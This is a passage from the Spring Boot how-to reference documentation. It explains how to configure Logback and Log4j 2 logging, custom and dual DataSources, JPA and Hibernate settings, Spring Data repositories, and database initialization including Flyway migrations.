Spring Boot provides a default base configuration that you can include if you\nwant to set levels, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/base.xml\"\/>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nIf you look at `base.xml` in the spring-boot jar, you can see that it uses\nsome useful System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: The value of `logging.file`, if it was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: The value of `logging.path` (representing a directory for\n log files to live in), if it was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: The value of `logging.exception-conversion-word`,\n if it was set in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in\na log file) by using a custom Logback converter. See the default `base.xml` configuration\nfor details.\n\nIf Groovy is on the classpath, you should be able to configure Logback with\n`logback.groovy` as well. If present, that file is given preference.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom\n`logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file` to your `application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include Log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. 
The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. 
If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant subset of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how to create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. 
You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the `DataSource` that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource`, and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub-namespace. Because `DataSourceProperties` takes\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot exposes Hikari-specific settings under `spring.datasource.hikari`. This\nexample uses the more generic `configuration` sub-namespace because it does not support\nmultiple data source implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. 
For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) as your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects (a minimal sketch is shown below). Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n
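A minimal sketch of such a repository, for a hypothetical `City` entity with a `name`\nproperty (neither is part of the samples above), could look as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.data.repository.CrudRepository;\n\n\t\/\/ Spring Data creates the implementation at runtime; no further code is required\n\tpublic interface CityRepository extends CrudRepository<City, Long> {\n\n\t\t\/\/ Derived query: resolves to a lookup by the entity's name property\n\t\tCity findByName(String name);\n\n\t}\n----\n\n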
\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context, so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` property is a special case, because, depending on\nruntime conditions, it has different defaults. If an embedded database is used and no\nschema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence over anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. 
Rather than configuring Hibernate to look up the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you are using JCache, this is straightforward. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of a second bean of that type switches off the\ndefault. To make that easy, you can use the convenient `EntityManagerFactoryBuilder`\nprovided by Spring Boot. Alternatively, you can use the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\n
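As a minimal sketch (reusing the bean names from the preceding example; the method names\nare assumptions), the two transaction managers could be defined as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@Primary\n\tpublic PlatformTransactionManager customerTransactionManager(\n\t\t\t@Qualifier(\"customerEntityManagerFactory\") EntityManagerFactory entityManagerFactory) {\n\t\t\/\/ Backs the default transaction management\n\t\treturn new JpaTransactionManager(entityManagerFactory);\n\t}\n\n\t@Bean\n\tpublic PlatformTransactionManager orderTransactionManager(\n\t\t\t@Qualifier(\"orderEntityManagerFactory\") EntityManagerFactory entityManagerFactory) {\n\t\t\/\/ Must be referenced explicitly, e.g. @Transactional(\"orderTransactionManager\")\n\t\treturn new JpaTransactionManager(entityManagerFactory);\n\t}\n----\n\n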
If you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n
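For instance, the following sketch (the values are illustrative, not defaults you must\nchange) tunes how pageable requests are resolved:\n\n[source,properties,indent=0]\n----\n\t# Use ?p=... and ?s=... instead of ?page=... and ?sort=...\n\tspring.data.web.pageable.page-parameter=p\n\tspring.data.web.sort.sort-parameter=s\n\t# Return 25 items per page unless the request asks for another size\n\tspring.data.web.pageable.default-page-size=25\n----\n\n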
\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n
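For instance, a minimal, vendor-independent setup that re-creates the schema on each\nstart (suitable for development only) might look as follows:\n\n[source,properties,indent=0]\n----\n\t# Switch DDL generation on\n\tspring.jpa.generate-ddl=true\n\t# Drop and re-create the schema every time the application starts\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\n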
\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected, or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. 
You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand https:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/\\{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available 